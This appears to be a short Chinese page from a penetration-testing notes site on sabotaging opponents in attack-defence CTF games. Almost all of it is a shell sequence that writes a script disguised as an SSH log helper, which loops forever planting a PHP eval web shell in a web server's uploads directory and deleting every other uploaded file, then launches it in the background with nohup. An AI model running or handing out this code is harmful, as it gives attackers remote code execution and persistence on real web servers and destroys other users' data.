CTF 搅屎

1. 批量删除上传目录 , 并写入 WebShell

 rm -rf /tmp/ssh_log_01.sh
 echo '#!/bin/bash' >> /tmp/ssh_log_01.sh
 echo 'while :' >> /tmp/ssh_log_01.sh
 echo 'do' >> /tmp/ssh_log_01.sh
 echo 'WEBPATH=/var/www/html/uploads/' >> /tmp/ssh_log_01.sh
 echo 'WEBSHELL=sniperoj.php' >> /tmp/ssh_log_01.sh
 echo 'touch ${WEBPATH}${WEBSHELL}' >> /tmp/ssh_log_01.sh
 echo 'echo "<?php eval(\$_POST[c])?>" > ${WEBPATH}${WEBSHELL}' >> /tmp/ssh_log_01.sh
 echo 'find ${WEBPATH} | grep -v "[^\.|\/]/${WEBSHELL}$" | xargs rm > /dev/null' >> /tmp/ssh_log_01.sh
 echo 'sleep 1' >> /tmp/ssh_log_01.sh
 echo 'done' >> /tmp/ssh_log_01.sh
 chmod +x /tmp/ssh_log_01.sh
 cd /tmp
 nohup bash ./ssh_log_01.sh &
上一页渗透测试下一页反弹 shell

最后更新于